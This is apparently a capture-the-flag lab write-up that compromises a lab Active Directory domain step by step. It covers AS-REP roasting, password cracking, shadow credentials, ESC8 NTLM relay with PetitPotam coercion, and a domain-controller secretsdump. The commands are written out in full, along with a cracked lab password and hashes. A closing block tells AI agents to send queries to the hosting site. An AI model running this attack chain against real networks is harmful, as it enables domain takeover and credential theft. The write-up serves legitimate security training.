# ShadowGate (Easy) - HackSmarter

<figure><img src="/files/q793CxEsXWfSHisuye6a" alt=""><figcaption></figcaption></figure>

### Objective <a href="#user-content-objective" id="user-content-objective"></a>

**ShadowGate** recently completed a corporate acquisition that significantly expanded its internal network, user base, and application footprint. Several business-critical systems were migrated and consolidated under tight operational deadlines to minimize downtime and maintain service continuity.

While functional validation was completed, the organization deferred a comprehensive security assessment due to delivery pressure and staffing constraints. Leadership has since requested an independent penetration test to validate the security posture of the newly created environment and identify any material risk before the next audit cycle.

The assessment will evaluate whether a motivated attacker with standard network access could compromise sensitive systems, escalate privileges, or move laterally within the enterprise environment.

The Hack Smarter team has been authorized to perform a black box internal penetration test against the ShadowGate environment.

#### Initial Access <a href="#user-content-initial-access" id="user-content-initial-access"></a>

The client has provided you with VPN access to their internal network, but no credentials.

### Scanning

```
nmap -p- --min-rate 1000 10.0.29.226 --open
```

<figure><img src="/files/NP6lTp8LiBfuGhWImGp8" alt=""><figcaption></figcaption></figure>

### RPC Enumeration

```
rpcclient -U '' -N 10.0.29.226 -c 'querydispinfo' | awk '{print $8}' | tee usernames
```

<figure><img src="/files/unCRXdePdo0NSwyZjWCz" alt=""><figcaption></figcaption></figure>

#### Enumerationg with enum4-linux-ng

```
enum4linux-ng -A 10.0.29.226
```

`Lockout threshold: 10`

### AS-REP

* **AS-REP roasting** targets accounts with **“Do not require Kerberos preauthentication”** enabled.
* The attacker requests an **AS-REP** (Authentication Service Reply) from the KDC *without knowing the password*.
* The returned blob (`$krb5asrep$23$...`) can then be cracked offline with tools like Hashcat or John.

```
kerbrute userenum --domain shadow.gate usernames --dc 10.0.29.226 --downgrade
```

<figure><img src="/files/zGh5P8EFDxI7zJ2Jo4gz" alt=""><figcaption></figcaption></figure>

Cracking the hash

```
hashcat jtrueblood.hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/XabVE63kurPFa2W52Q4Q" alt=""><figcaption></figcaption></figure>

```
jtrueblood : blood_brothers
```

### Auth as jtrueblood

```
nxc smb shadow.gate -u jtrueblood -p blood_brothers --shares
```

<figure><img src="/files/kI7rRasH2ovMo5FXDq7X" alt=""><figcaption></figcaption></figure>

* We have group called '`CertEnroll`' maybe some AD-CS things in further attack vector we will keep a note of it.

### Bloodhound Data Collection

```
bloodhound-python -u jtrueblood -p blood_brothers  -ns 10.0.29.226   -c All -d shadow.gate --zip
```

<figure><img src="/files/wIEG7rHuVE48xjVGjfpV" alt=""><figcaption></figcaption></figure>

Analzying the bloodhound data we see ACL

### GenericWrite

<figure><img src="/files/Qv8KASSzwuOQtD1gkNnq" alt=""><figcaption></figcaption></figure>

Shadow Creds

```
certipy shadow auto -u 'jtrueblood@shadow.gate' -p 'blood_brothers' -account BBROWN
```

<figure><img src="/files/qQVlIUPp9rcksozGNhie" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZTLccyCT1MRzfMlRkFGr" alt=""><figcaption></figcaption></figure>

* We're member of ADCS Reader

### Certipy

```
certipy find -u BBROWN@shadow.gate -hashes 259745cb123a52aa2e693aaacca2db52 -vulnerable -stdout
```

```
  ESC8                              : Web Enrollment is enabled over HTTP.
```

<figure><img src="/files/albbBkg1YfGmydFDmHmh" alt=""><figcaption></figcaption></figure>

### Exploiting ESC8

1. **Set up NTLM Relay:** The attacker uses an NTLM relay tool, such as Certipy's `relay` command, listening for incoming NTLM authentications.
2. **Coerce Authentication:** The attacker coerces a privileged account to authenticate to a machine controlled by the attacker using NTLM. Common targets for coercion include Domain Controller machine accounts&#x20;

If relaying a Domain Controller account, it's common to specify the `DomainController` template, as DCs typically have enrollment rights for it:

```
certipy-ad relay -target 10.0.29.226 -template 'DomainController'
```

```
python PetitPotam.py -u jtrueblood -p blood_brothers 10.200.54.19 10.0.29.226
```

<figure><img src="/files/JEhpXpXTJUxyPTiWr6ca" alt=""><figcaption></figcaption></figure>

```
certipy-ad auth -pfx 'dc01.pfx' -dc-ip '10.0.29.226'
```

<figure><img src="/files/YRKrHToZAgCQ9yGocNI8" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vhfFljqo9FA6w3LJgVjL" alt=""><figcaption></figcaption></figure>

```
impacket-secretsdump shadow.gate/'dc01$'@10.0.29.226 -hashes :57867e655d1abc9f45fd6e954e351531
```

<figure><img src="/files/n6QFylwMnjNJf48LmXNp" alt=""><figcaption></figcaption></figure>

References :&#x20;

{% embed url="<https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hacksmarter-labs/shadowgate-easy-hacksmarter.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.